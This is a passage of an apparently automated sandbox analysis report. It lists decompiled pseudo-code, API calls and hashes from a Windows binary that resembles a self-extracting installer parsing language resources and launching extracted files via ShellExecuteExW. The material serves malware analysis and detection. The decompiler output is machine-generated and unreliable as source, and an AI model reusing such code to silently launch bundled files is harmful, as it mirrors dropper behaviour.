											__eflags = _t336;
											goto L98;
										}
										__eflags = _t336 - 0x10000;
										if(_t336 >= 0x10000) {
											goto L52;
										}
										_t235 = ( *(_t228 + _t383 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t235;
										if(_t235 == 0) {
											_push(0x22);
											L93:
											_pop(_t377);
											 *(_t390[0x1b] + _t336 * 2) = _t377;
											_t336 = _t336 + 1;
											_t390[0x1e] = _t336;
											_t383 = _t383 + 1;
											goto L52;
										}
										_t237 = _t235 - 0x3a;
										__eflags = _t237;
										if(_t237 == 0) {
											_push(0x5c);
											goto L93;
										}
										_t238 = _t237 - 0x12;
										__eflags = _t238;
										if(_t238 == 0) {
											_push(0xa);
											goto L93;
										}
										_t239 = _t238 - 4;
										__eflags = _t239;
										if(_t239 == 0) {
											_push(0xd);
											goto L93;
										}
										__eflags = _t239 != 0;
										if(_t239 != 0) {
											goto L96;
										}
										_push(9);
										goto L93;
									}
									_t373 =  *(_t228 + _t383 * 2 - 2) & 0x0000ffff;
									__eflags = _t373 - _t390[0x14];
									if(_t373 == _t390[0x14]) {
										L42:
										_t343 = 0x3a;
										__eflags =  *(_t228 + _t383 * 2) - _t343;
										if( *(_t228 + _t383 * 2) != _t343) {
											L71:
											_t390[0x18] = _t228 + _t383 * 2;
											_t244 = E00D7F91A( *(_t228 + _t383 * 2) & 0x0000ffff);
											__eflags = _t244;
											if(_t244 == 0) {
												L79:
												_t336 = _t390[0x1e];
												_t228 = _t390[0x1a];
												goto L80;
											}
											E00D7FAB1(_t390 - 0x264, _t390[0x18], 0x64);
											_t248 = E00D94E1D(_t390 - 0x264, L" \t,");
											_t390[0x18] = _t248;
											__eflags = _t248;
											if(_t248 == 0) {
												goto L79;
											}
											 *_t248 = 0;
											E00D811FA(_t390 - 0x264, _t390 - 0x138, 0x64);
											E00D7FA56(_t390 - 0x70, _t390 - 0xd4, 0x64);
											E00D7FA2F(__eflags, _t390 - 0x70, _t390 - 0x138, 0x64);
											E00D7FA56(_t390, _t390 - 0x70, 0x32);
											_t262 = E00D94E71(_t316, 0, _t383, _t387, _t390 - 0x70,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E00D7CCED);
											_t394 = _t394 + 0x14;
											__eflags = _t262;
											if(_t262 != 0) {
												_t268 =  *_t262 * 0xc;
												__eflags = _t268;
												_t167 = _t268 + 0xdad150; // 0x28b64ee0
												_t390[0x17] =  *_t167;
											}
											_t383 = _t383 + (_t390[0x18] - _t390 - 0x264 >> 1) + 1;
											__eflags = _t383;
											_t267 = _t390[0x1a];
											_t374 = 0x20;
											while(1) {
												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
												__eflags = _t348 - _t374;
												if(_t348 == _t374) {
													goto L78;
												}
												L77:
												_t174 =  &(_t390[0x15]); // 0x9
												__eflags = _t348 -  *_t174;
												if(_t348 !=  *_t174) {
													L51:
													_t336 = _t390[0x1e];
													goto L52;
												}
												L78:
												_t383 = _t383 + 1;
												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
												__eflags = _t348 - _t374;
												if(_t348 == _t374) {
													goto L78;
												}
												goto L77;
											}
										}
										_t389 = _t390[0x1a];
										_t270 = _t228 | 0xffffffff;
										__eflags = _t270;
										_t390[0x16] = _t270;
										_t390[0xd] = L"STRINGS";
										_t390[0xe] = L"DIALOG";
										_t390[0xf] = L"MENU";
										_t390[0x10] = L"DIRECTION";
										_t390[0x18] = _t316;
										do {
											_t390[0x18] = E00D92B33( *((intOrPtr*)(_t390 + 0x34 + _t316 * 4)));
											_t272 = E00D94DA0(_t389 + 2 + _t383 * 2,  *((intOrPtr*)(_t390 + 0x34 + _t316 * 4)), _t271);
											_t394 = _t394 + 0x10;
											_t375 = 0x20;
											__eflags = _t272;
											if(_t272 != 0) {
												L47:
												_t273 = _t390[0x16];
												goto L48;
											}
											_t357 = _t390[0x18] + _t383;
											__eflags =  *((intOrPtr*)(_t389 + 2 + _t357 * 2)) - _t375;
											if( *((intOrPtr*)(_t389 + 2 + _t357 * 2)) > _t375) {
												goto L47;
											}
											_t273 = _t316;
											_t383 = _t357 + 1;
											_t390[0x16] = _t273;
											L48:
											_t316 = _t316 + 1;
											__eflags = _t316 - 4;
										} while (_t316 < 4);
										_t387 = _t390[0x12];
										_t316 = 0;
										__eflags = _t273;
										if(__eflags != 0) {
											_t228 = _t390[0x1a];
											if(__eflags <= 0) {
												goto L71;
											} else {
												goto L59;
											}
											while(1) {
												L59:
												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
												__eflags = _t351 - _t375;
												if(_t351 == _t375) {
													goto L61;
												}
												L60:
												_t132 =  &(_t390[0x15]); // 0x9
												__eflags = _t351 -  *_t132;
												if(_t351 !=  *_t132) {
													_t376 = _t228 + _t383 * 2;
													_t390[0x18] = _t316;
													_t274 = 0x20;
													_t352 = _t316;
													__eflags =  *_t376 - _t274;
													if( *_t376 <= _t274) {
														L66:
														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = 0;
														E00D811FA(_t390 - 0x19c, _t390 - 0x70, 0x64);
														_t383 = _t383 + _t390[0x18];
														_t279 = _t390[0x16];
														__eflags = _t279 - 3;
														if(_t279 != 3) {
															__eflags = _t279 - 1;
															_t280 = "$%s:";
															if(_t279 != 1) {
																_t280 = "@%s:";
															}
															E00D7D9DC(_t390 - 0xd4, 0x64, _t280, _t390 - 0x70);
															_t394 = _t394 + 0x10;
														} else {
															_t284 = E00D92B69(_t390 - 0x19c, _t390 - 0x19c, L"RTL");
															asm("sbb al, al");
															 *((char*)(_t387 + 0x64)) =  ~_t284 + 1;
														}
														goto L51;
													} else {
														goto L63;
													}
													while(1) {
														L63:
														__eflags = _t352 - 0x63;
														if(_t352 >= 0x63) {
															break;
														}
														_t287 =  *_t376;
														_t376 = _t376 + 2;
														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = _t287;
														_t352 = _t352 + 1;
														_t288 = 0x20;
														__eflags =  *_t376 - _t288;
														if( *_t376 > _t288) {
															continue;
														}
														break;
													}
													_t390[0x18] = _t352;
													goto L66;
												}
												L61:
												_t383 = _t383 + 1;
												L59:
												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
												__eflags = _t351 - _t375;
												if(_t351 == _t375) {
													goto L61;
												}
												goto L60;
											}
										}
										E00D7FA56(_t390 - 0xd4, 0xda2624, 0x64);
										goto L51;
									}
									__eflags = _t373 - _t390[0x13];
									if(_t373 != _t390[0x13]) {
										goto L80;
									}
									goto L42;
									L52:
									__eflags = _t383 - _t390[0x19];
								} while (_t383 < _t390[0x19]);
								_t218 = _t390[0x1b];
								_t371 = _t390[0x17];
								goto L54;
							} else {
								L00D92B4E(_t382);
								goto L57;
							}
						}
						_t333 = _t328 >> 1;
						_t390[0x19] = _t333;
						goto L33;
					} else {
						goto L5;
					}
					do {
						L5:
						E00D83393(_t387, _t370, _t380);
						E00D83393(_t387 + 0x14, _t370, _t380);
						_t380 = _t380 + 1;
						_t399 = _t380 -  *0xdad5f4; // 0x63
					} while (_t399 < 0);
					_t316 = 0;
					goto L7;
				}
			}








































































              0x00d7cfd0
              0x00d7cfd0
              0x00d7cfd1
              0x00d7cfd9
              0x00d7cfe3
              0x00d7cfed
              0x00d7cfee
              0x00d7cfef
              0x00d7cff2
              0x00d7cff4
              0x00d7cff7
              0x00d7cffa
              0x00d7d000
              0x00d7d002
              0x00d7d005
              0x00d7d00b
              0x00d7d047
              0x00d7d00d
              0x00d7d015
              0x00d7d02d
              0x00d7d037
              0x00d7d037
              0x00d7d052
              0x00d7d057
              0x00d7d05f
              0x00d7d062
              0x00d7d070
              0x00d7d42d
              0x00d7d433
              0x00d7d43e
              0x00d7d449
              0x00d7d076
              0x00d7d076
              0x00d7d078
              0x00d7d07e
              0x00d7d09c
              0x00d7d0a8
              0x00d7d0ba
              0x00d7d0bf
              0x00d7d0c2
              0x00d7d0c5
              0x00d7d0c8
              0x00d7d0cb
              0x00d7d0ce
              0x00d7d0e2
              0x00d7d0f7
              0x00d7d0fc
              0x00d7d0ff
              0x00d7d101
              0x00d7d101
              0x00d7d104
              0x00d7d109
              0x00d7d1c8
              0x00d7d1c8
              0x00d7d1cb
              0x00d7d1ce
              0x00d7d1df
              0x00d7d1e7
              0x00d7d1e8
              0x00d7d1eb
              0x00d7d1f0
              0x00000000
              0x00000000
              0x00d7d1f6
              0x00d7d1f9
              0x00000000
              0x00000000
              0x00000000
              0x00d7d1f9
              0x00000000
              0x00d7d10f
              0x00d7d117
              0x00d7d142
              0x00d7d144
              0x00d7d14d
              0x00d7d178
              0x00d7d180
              0x00d7d1ac
              0x00d7d1ac
              0x00d7d1b0
              0x00000000
              0x00000000
              0x00d7d1b2
              0x00000000
              0x00d7d18c
              0x00d7d19c
              0x00d7d1a1
              0x00d7d1a6
              0x00000000
              0x00000000
              0x00000000
              0x00d7d1a6
              0x00d7d180
              0x00d7d155
              0x00d7d15b
              0x00d7d16c
              0x00d7d171
              0x00d7d176
              0x00d7d1ba
              0x00000000
              0x00d7d1ba
              0x00d7d176
              0x00000000
              0x00d7d123
              0x00d7d133
              0x00d7d138
              0x00d7d13d
              0x00d7d1be
              0x00d7d1be
              0x00d7d1c1
              0x00d7d1c3
              0x00000000
              0x00d7d1c3
              0x00d7d13f
              0x00000000
              0x00d7d13f
              0x00d7d117
              0x00d7d10f
              0x00d7d208
              0x00d7d20b
              0x00d7d210
              0x00d7d21a
              0x00d7d21c
              0x00d7d220
              0x00d7d222
              0x00000000
              0x00000000
              0x00d7d239
              0x00d7d23e
              0x00d7d241
              0x00d7d243
              0x00d7d253
              0x00d7d254
              0x00d7d259
              0x00d7d25d
              0x00d7d25f
              0x00000000
              0x00000000
              0x00d7d265
              0x00d7d268
              0x00d7d26b
              0x00d7d26f
              0x00d7d275
              0x00d7d27a
              0x00d7d27e
              0x00d7d281
              0x00d7d284
              0x00d7d284
              0x00d7d289
              0x00d7d28b
              0x00d7d28d
              0x00d7d28d
              0x00d7d293
              0x00d7d2a3
              0x00d7d2a8
              0x00d7d2ad
              0x00d7d2b2
              0x00d7d2b6
              0x00d7d2b8
              0x00d7d2c6
              0x00d7d2ca
              0x00d7d2cc
              0x00d7d2ce
              0x00d7d2d1
              0x00d7d2d4
              0x00d7d2d6
              0x00d7d2d9
              0x00d7d3c1
              0x00d7d3ca
              0x00d7d3d2
              0x00d7d3da
              0x00d7d3e1
              0x00d7d3e4
              0x00d7d3fe
              0x00d7d40b
              0x00d7d413
              0x00d7d425
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d7d3e6
              0x00d7d3e6
              0x00d7d3ea
              0x00d7d3f3
              0x00d7d3f8
              0x00d7d3f9
              0x00d7d3f9
              0x00000000
              0x00d7d3e6
              0x00d7d2df
              0x00d7d2e6
              0x00d7d2ed
              0x00d7d2f4
              0x00d7d2f4
              0x00d7d2f7
              0x00d7d2f9
              0x00d7d5f5
              0x00d7d5f5
              0x00d7d5f9
              0x00d7d5fa
              0x00d7d5fd
              0x00000000
              0x00000000
              0x00d7d603
              0x00d7d607
              0x00d7d659
              0x00d7d65a
              0x00d7d65d
              0x00d7d683
              0x00d7d690
              0x00d7d695
              0x00d7d698
              0x00d7d69a
              0x00d7d67b
              0x00d7d67b
              0x00000000
              0x00d7d67b
              0x00d7d661
              0x00d7d662
              0x00d7d665
              0x00000000
              0x00000000
              0x00d7d667
              0x00d7d667
              0x00d7d66d
              0x00000000
              0x00000000
              0x00d7d676
              0x00d7d67a
              0x00d7d67a
              0x00000000
              0x00d7d67a
              0x00d7d609
              0x00d7d60f
              0x00000000
              0x00000000
              0x00d7d619
              0x00d7d619
              0x00d7d61c
              0x00d7d643
              0x00d7d645
              0x00d7d648
              0x00d7d649
              0x00d7d64d
              0x00d7d64e
              0x00d7d651
              0x00000000
              0x00d7d651
              0x00d7d61e
              0x00d7d61e
              0x00d7d621
              0x00d7d63f
              0x00000000
              0x00d7d63f
              0x00d7d623
              0x00d7d623
              0x00d7d626
              0x00d7d63b
              0x00000000
              0x00d7d63b
              0x00d7d628
              0x00d7d628
              0x00d7d62b
              0x00d7d637
              0x00000000
              0x00d7d637
              0x00d7d62e
              0x00d7d631
              0x00000000
              0x00000000
              0x00d7d633
              0x00000000
              0x00d7d633
              0x00d7d2ff
              0x00d7d304
              0x00d7d308
              0x00d7d314
              0x00d7d316
              0x00d7d317
              0x00d7d31b
              0x00d7d508
              0x00d7d50b
              0x00d7d512
              0x00d7d517
              0x00d7d519
              0x00d7d5ef
              0x00d7d5ef
              0x00d7d5f2
              0x00000000
              0x00d7d5f2
              0x00d7d52b
              0x00d7d53c
              0x00d7d541
              0x00d7d546
              0x00d7d548
              0x00000000
              0x00000000
              0x00d7d550
              0x00d7d563
              0x00d7d575
              0x00d7d587
              0x00d7d596
              0x00d7d5ab
              0x00d7d5b0
              0x00d7d5b3
              0x00d7d5b5
              0x00d7d5b7
              0x00d7d5b7
              0x00d7d5ba
              0x00d7d5c0
              0x00d7d5c0
              0x00d7d5d3
              0x00d7d5d3
              0x00d7d5d5
              0x00d7d5d8
              0x00d7d5d9
              0x00d7d5d9
              0x00d7d5dd
              0x00d7d5e0
              0x00000000
              0x00000000
              0x00d7d5e2
              0x00d7d5e2
              0x00d7d5e2
              0x00d7d5e6
              0x00d7d3af
              0x00d7d3af
              0x00000000
              0x00d7d3af
              0x00d7d5ec
              0x00d7d5ec
              0x00d7d5d9
              0x00d7d5dd
              0x00d7d5e0
              0x00000000
              0x00000000
              0x00000000
              0x00d7d5e0
              0x00d7d5d9
              0x00d7d321
              0x00d7d324
              0x00d7d324
              0x00d7d327
              0x00d7d32a
              0x00d7d331
              0x00d7d338
              0x00d7d33f
              0x00d7d346
              0x00d7d349
              0x00d7d35a
              0x00d7d361
              0x00d7d366
              0x00d7d36b
              0x00d7d36c
              0x00d7d36e
              0x00d7d386
              0x00d7d386
              0x00000000
              0x00d7d386
              0x00d7d373
              0x00d7d375
              0x00d7d37a
              0x00000000
              0x00000000
              0x00d7d37c
              0x00d7d37e
              0x00d7d381
              0x00d7d389
              0x00d7d389
              0x00d7d38a
              0x00d7d38a
              0x00d7d38f
              0x00d7d392
              0x00d7d394
              0x00d7d396
              0x00d7d44c
              0x00d7d44f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d7d455
              0x00d7d455
              0x00d7d455
              0x00d7d459
              0x00d7d45c
              0x00000000
              0x00000000
              0x00d7d45e
              0x00d7d45e
              0x00d7d45e
              0x00d7d462
              0x00d7d467
              0x00d7d46a
              0x00d7d46f
              0x00d7d470
              0x00d7d472
              0x00d7d475
              0x00d7d496
              0x00d7d498
              0x00d7d4ad
              0x00d7d4b2
              0x00d7d4b5
              0x00d7d4b8
              0x00d7d4bb
              0x00d7d4de
              0x00d7d4e1
              0x00d7d4e6
              0x00d7d4e8
              0x00d7d4e8
              0x00d7d4fb
              0x00d7d500
              0x00d7d4bd
              0x00d7d4c9
              0x00d7d4d1
              0x00d7d4d6
              0x00d7d4d6
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d7d477
              0x00d7d477
              0x00d7d477
              0x00d7d47a
              0x00000000
              0x00000000
              0x00d7d47c
              0x00d7d47f
              0x00d7d482
              0x00d7d48a
              0x00d7d48d
              0x00d7d48e
              0x00d7d491
              0x00000000
              0x00000000
              0x00000000
              0x00d7d491
              0x00d7d493
              0x00000000
              0x00d7d493
              0x00d7d464
              0x00d7d464
              0x00d7d455
              0x00d7d455
              0x00d7d459
              0x00d7d45c
              0x00000000
              0x00000000
              0x00000000
              0x00d7d45c
              0x00d7d455
              0x00d7d3aa
              0x00000000
              0x00d7d3aa
              0x00d7d30a
              0x00d7d30e
              0x00000000
              0x00000000
              0x00000000
              0x00d7d3b2
              0x00d7d3b2
              0x00d7d3b2
              0x00d7d3bb
              0x00d7d3be
              0x00000000
              0x00d7d2ba
              0x00d7d2bb
              0x00000000
              0x00d7d2c0
              0x00d7d2b8
              0x00d7d245
              0x00d7d247
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d7d080
              0x00d7d080
              0x00d7d083
              0x00d7d08c
              0x00d7d091
              0x00d7d092
              0x00d7d092
              0x00d7d09a
              0x00000000
              0x00d7d09a

              APIs
              • __EH_prolog.LIBCMT ref: 00D7CFD9
              • _wcschr.LIBVCRUNTIME ref: 00D7CFFA
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D7D015
              • __fprintf_l.LIBCMT ref: 00D7D4FB
                • Part of subcall function 00D80FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D7B312,00000000,?,?,?,000F01D2), ref: 00D80FFA
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
              • API String ID: 4184910265-4124877899
              • Opcode ID: a22144eb268e5e3350893798d17538bfc70fac54cc1a4623de07064f34d923ce
              • Instruction ID: 27da9ab50e81039b0e1ad100b5c7523c1cae335139ecd7203c5abd8d655243db
              • Opcode Fuzzy Hash: a22144eb268e5e3350893798d17538bfc70fac54cc1a4623de07064f34d923ce
              • Instruction Fuzzy Hash: 5212AB71600309ABDF24EFA4D841AAD37BAEF05314F58812AF94D97291EB71E985CB70
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8C190, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D8C190(intOrPtr _a4, long _a8) {
				char _v67;
				intOrPtr _v72;
				signed int _v84;
				int _v88;
				void* _v92;
				intOrPtr _t40;
				intOrPtr _t43;
				struct HWND__* _t45;
				char _t48;

				E00D8A388(); // executed
				_t45 = GetDlgItem( *0xdb75c8, 0x68);
				_t48 =  *0xdb75d6; // 0x1
				if(_t48 == 0) {
					_t43 =  *0xdb75e8; // 0x0
					E00D88569(_t43);
					ShowWindow(_t45, 5); // executed
					SendMessageW(_t45, 0xb1, 0, 0xffffffff);
					SendMessageW(_t45, 0xc2, 0, 0xda22e4);
					 *0xdb75d6 = 1;
				}
				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
				_v92 = 0x5c;
				SendMessageW(_t45, 0x43a, 0,  &_v92);
				_v67 = 0;
				_t40 = _a4;
				_v88 = 1;
				if(_t40 != 0) {
					_v72 = 0xa0;
					_v88 = 0x40000001;
					_v84 = _v84 & 0xbfffffff | 1;
				}
				SendMessageW(_t45, 0x444, 1,  &_v92);
				SendMessageW(_t45, 0xc2, 0, _a8);
				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t40 != 0) {
					_v84 = _v84 & 0xfffffffe | 0x40000000;
					SendMessageW(_t45, 0x444, 1,  &_v92);
				}
				return SendMessageW(_t45, 0xc2, 0, L"\r\n");
			}












              0x00d8c197
              0x00d8c1b2
              0x00d8c1b9
              0x00d8c1bf
              0x00d8c1c1
              0x00d8c1c7
              0x00d8c1cf
              0x00d8c1de
              0x00d8c1e8
              0x00d8c1ea
              0x00d8c1ea
              0x00d8c1fe
              0x00d8c204
              0x00d8c214
              0x00d8c218
              0x00d8c21c
              0x00d8c221
              0x00d8c227
              0x00d8c232
              0x00d8c23c
              0x00d8c244
              0x00d8c244
              0x00d8c254
              0x00d8c25e
              0x00d8c26d
              0x00d8c271
              0x00d8c27f
              0x00d8c290
              0x00d8c290
              0x00d8c2a4

              APIs
                • Part of subcall function 00D8A388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D8A399
                • Part of subcall function 00D8A388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D8A3AA
                • Part of subcall function 00D8A388: IsDialogMessageW.USER32(000F01D2,?), ref: 00D8A3BE
                • Part of subcall function 00D8A388: TranslateMessage.USER32(?), ref: 00D8A3CC
                • Part of subcall function 00D8A388: DispatchMessageW.USER32(?), ref: 00D8A3D6
              • GetDlgItem.USER32(00000068,00DCDE38), ref: 00D8C1A4
              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00D89D8F), ref: 00D8C1CF
              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D8C1DE
              • SendMessageW.USER32(00000000,000000C2,00000000,00DA22E4), ref: 00D8C1E8
              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D8C1FE
              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D8C214
              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D8C254
              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D8C25E
              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D8C26D
              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D8C290
              • SendMessageW.USER32(00000000,000000C2,00000000,00DA304C), ref: 00D8C29B
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
              • String ID: \
              • API String ID: 3569833718-2967466578
              • Opcode ID: a247faee1b8516472458541ae39ae7b82fa5ced4bbfeb28b65d32f180360cfe7
              • Instruction ID: 9ce185972018a29e956f77fb3e1f0a9c4e1c7d9d37ee9ace42bbb43e17a84da9
              • Opcode Fuzzy Hash: a247faee1b8516472458541ae39ae7b82fa5ced4bbfeb28b65d32f180360cfe7
              • Instruction Fuzzy Hash: 01212571245344BFE311FB248C41FAB7BDCEF82754F000608F651E62D1C7A559098BBA
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8C431, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
              Download Yara Rule
              C-Code - Quality: 48%
              			E00D8C431(struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, int _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, signed short* _a4168, intOrPtr _a4172) {
				signed short _v0;
				long _v12;
				void* __edi;
				int _t54;
				signed int _t57;
				signed short* _t58;
				long _t68;
				int _t77;
				signed int _t80;
				signed short* _t81;
				signed short _t82;
				intOrPtr _t84;
				long _t86;
				signed short* _t87;
				struct HWND__* _t89;
				signed short* _t91;
				void* _t93;
				void* _t95;
				void* _t99;

				_t54 = 0x1040;
				E00D8D940();
				_t91 = _a4168;
				_t77 = 0;
				if( *_t91 == 0) {
					L55:
					return _t54;
				}
				_t54 = E00D92B33(_t91);
				if(0x1040 >= 0x7f6) {
					goto L55;
				} else {
					_t86 = 0x3c;
					E00D8E920(_t86,  &_a4, 0, _t86);
					_t84 = _a4172;
					_t99 = _t99 + 0xc;
					_a4.cbSize = _t86;
					_a8 = 0x1c0;
					if(_t84 != 0) {
						_a8 = 0x5c0;
					}
					_t80 =  *_t91 & 0x0000ffff;
					_t87 =  &(_t91[1]);
					_t95 = 0x22;
					if(_t80 != _t95) {
						_t87 = _t91;
					}
					_a20 = _t87;
					_t57 = _t77;
					if(_t80 == 0) {
						L13:
						_t58 = _a24;
						L14:
						if(_t58 == 0 ||  *_t58 == _t77) {
							if(_t84 == 0 &&  *0xdba602 != _t77) {
								_a24 = 0xdba602;
							}
						}
						_a32 = 1;
						_t93 = E00D7B153(_t87);
						if(_t93 != 0 && E00D81410(_t93, L".inf") == 0) {
							_a16 = L"Install";
						}
						if(E00D79E6B(_a20) != 0) {
							_push(0x800);
							_push( &_a64);
							_push(_a20);
							E00D7AED7();
							_a8 =  &_a52;
						}
						_t54 = ShellExecuteExW( &_a4); // executed
						if(_t54 != 0) {
							_t89 = _a4160;
							if( *0xdb85f8 != _t77 || _a4168 != _t77 ||  *0xdcde21 != _t77) {
								if(_t89 != 0) {
									_push(_t89);
									if( *0xdadf24() != 0) {
										ShowWindow(_t89, _t77);
										_t77 = 1;
									}
								}
								 *0xdadf20(_a56, 0x7d0);
								E00D8C8F0(_a48);
								if( *0xdcde21 != 0 && _a4160 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
									_t68 = _v12;
									if(_t68 >  *0xdcde24) {
										 *0xdcde24 = _t68;
									}
									 *0xdcde22 = 1;
								}
							}
							CloseHandle(_a48);
							if(_t93 == 0 || E00D81410(_t93, L".exe") != 0) {
								_t54 = _a4160;
								if( *0xdb85f8 != 0 && _t54 == 0 &&  *0xdcde21 == _t54) {
									 *0xdcde28 = 0x1b58;
								}
							} else {
								_t54 = _a4160;
							}
							if(_t77 != 0 && _t54 != 0) {
								_t54 = ShowWindow(_t89, 1);
							}
						}
						goto L55;
					}
					_t81 = _t91;
					_v0 = 0x20;
					do {
						if( *_t81 == _t95) {
							while(1) {
								_t57 = _t57 + 1;
								if(_t91[_t57] == _t77) {
									break;
								}
								if(_t91[_t57] == _t95) {
									_t82 = _v0;
									_t91[_t57] = _t82;
									L10:
									if(_t91[_t57] == _t82 ||  *((short*)(_t91 + 2 + _t57 * 2)) == 0x2f) {
										if(_t91[_t57] == _v0) {
											_t91[_t57] = 0;
										}
										_t58 =  &(_t91[_t57 + 1]);
										_a24 = _t58;
										goto L14;
									} else {
										goto L12;
									}
								}
							}
						}
						_t82 = _v0;
						goto L10;
						L12:
						_t57 = _t57 + 1;
						_t81 =  &(_t91[_t57]);
					} while ( *_t81 != _t77);
					goto L13;
				}
			}






















              0x00d8c431
              0x00d8c436
              0x00d8c43d
              0x00d8c444
              0x00d8c449
              0x00d8c695
              0x00d8c69d
              0x00d8c69d
              0x00d8c450
              0x00d8c45b
              0x00000000
              0x00d8c461
              0x00d8c464
              0x00d8c46c
              0x00d8c471
              0x00d8c478
              0x00d8c47b
              0x00d8c47f
              0x00d8c489
              0x00d8c48b
              0x00d8c48b
              0x00d8c493
              0x00d8c496
              0x00d8c49c
              0x00d8c4a0
              0x00d8c4a2
              0x00d8c4a2
              0x00d8c4a4
              0x00d8c4a8
              0x00d8c4ad
              0x00d8c4e5
              0x00d8c4e5
              0x00d8c4e9
              0x00d8c4eb
              0x00d8c4f4
              0x00d8c4ff
              0x00d8c4ff
              0x00d8c4f4
              0x00d8c508
              0x00d8c515
              0x00d8c519
              0x00d8c52a
              0x00d8c52a
              0x00d8c53d
              0x00d8c53f
              0x00d8c548
              0x00d8c549
              0x00d8c54d
              0x00d8c556
              0x00d8c556
              0x00d8c55f
              0x00d8c567
              0x00d8c56d
              0x00d8c580
              0x00d8c595
              0x00d8c597
              0x00d8c5a0
              0x00d8c5a4
              0x00d8c5a6
              0x00d8c5a6
              0x00d8c5a0
              0x00d8c5b1
              0x00d8c5bb
              0x00d8c5c7
              0x00d8c5e6
              0x00d8c5f0
              0x00d8c5f2
              0x00d8c5f2
              0x00d8c5f7
              0x00d8c5f7
              0x00d8c5c7
              0x00d8c602
              0x00d8c60a
              0x00d8c622
              0x00d8c629
              0x00d8c637
              0x00d8c637
              0x00d8c67f
              0x00d8c67f
              0x00d8c67f
              0x00d8c688
              0x00d8c691
              0x00d8c691
              0x00d8c688
              0x00000000
              0x00d8c694
              0x00d8c4af
              0x00d8c4b1
              0x00d8c4b9
              0x00d8c4bc
              0x00d8c649
              0x00d8c649
              0x00d8c64e
              0x00000000
              0x00000000
              0x00d8c647
              0x00d8c655
              0x00d8c659
              0x00d8c4c6
              0x00d8c4ca
              0x00d8c66a
              0x00d8c66e
              0x00d8c66e
              0x00d8c673
              0x00d8c676
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d8c4ca
              0x00d8c647
              0x00d8c650
              0x00d8c4c2
              0x00000000
              0x00d8c4dc
              0x00d8c4dc
              0x00d8c4dd
              0x00d8c4e0
              0x00000000
              0x00d8c4b9

              APIs
              • ShellExecuteExW.SHELL32(000001C0), ref: 00D8C55F
              • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 00D8C5A4
              • GetExitCodeProcess.KERNEL32 ref: 00D8C5DC
              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D8C602
              • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 00D8C691
                • Part of subcall function 00D81410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00D7ACFE,?,?,?,00D7ACAD,?,-00000002,?,00000000,?), ref: 00D81426
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
